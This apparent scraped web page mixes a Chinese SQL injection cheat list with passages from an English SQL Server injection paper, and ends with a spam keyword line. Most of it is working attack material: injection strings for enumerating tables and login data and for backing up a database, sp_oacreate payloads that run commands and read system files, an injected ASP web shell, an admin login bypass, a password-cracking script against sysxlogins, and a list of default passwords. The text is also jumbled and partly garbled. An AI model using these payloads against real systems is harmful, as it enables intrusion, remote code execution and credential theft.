_blank>http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk='e:/web/down.bak';-- and 1=(select top 1 name from(select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)and 1=(select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) 参看相关表。and 1=(select user_id from USER_LOGIN)and 0=(select user from USER_LOGIN where user>1)……………………………………………………-- wscript.shell example declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' It could be run in our sample scenario by specifying the following username (all on one line): Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'-- 2) This example uses the 'scripting.filesystemobject' object to read a known text file: -- scripting.filesystemobject example - read a known file declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:/boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end 3) This example creates an ASP script that will run any command passed to it in the querystring: -- scripting.filesystemobject example - create a 'run this' .asp file declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:/inetpub/wwwroot/foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell": o.run( request.querystring("cmd" ) %>' It is important to note that when running on a Windows NT4, IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account. 4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak: Page 16declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528 waitfor delay '00:00:05' This could of course be run in our example scenario, by specifying the following 'username' (note that the example is not only injecting a script, but simultaneously logging in to the application as 'admin'): Username: admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'-- 常用密码和相关语句:
password sqlserver sql admin sesame sa guest Here is the script: (sqlcrack.sql) create table tempdb..passwords( pwd varchar(255) ) bulk insert tempdb..passwords from 'c:/temp/passwords.txt' select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where (pwdcompare( name, sysxlogins.password, 0 ) = 1) union select sysxlogins.name, null from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid where sysxlogins.password is null and syslogins.isntgroup=0 and syslogins.isntuser=0 drop table tempdb..passwords——l love this game
关键字:软件 服务器 qq os msn dos 美女 电影 小说 音乐 无极 汽车 MP3
